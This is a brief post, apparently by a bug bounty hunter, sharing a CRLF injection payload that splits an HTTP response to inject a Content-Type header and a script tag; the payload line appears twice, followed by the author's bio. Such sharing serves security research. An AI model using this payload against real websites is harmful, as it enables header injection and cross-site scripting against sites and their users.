Mar 1, 2024
It was a simple payload as the CRLF payloads looks like was %0d%0aContent-Type:text/html%0a%0a%0a%0a%0a<script>alert(1)</script>
It was a simple payload as the CRLF payloads looks like was %0d%0aContent-Type:text/html%0a%0a%0a%0a%0a<script>alert(1)</script>
Bug Hunter || Security Researcher at Hackerone, Detectify Crowdsource, Synack Red Team.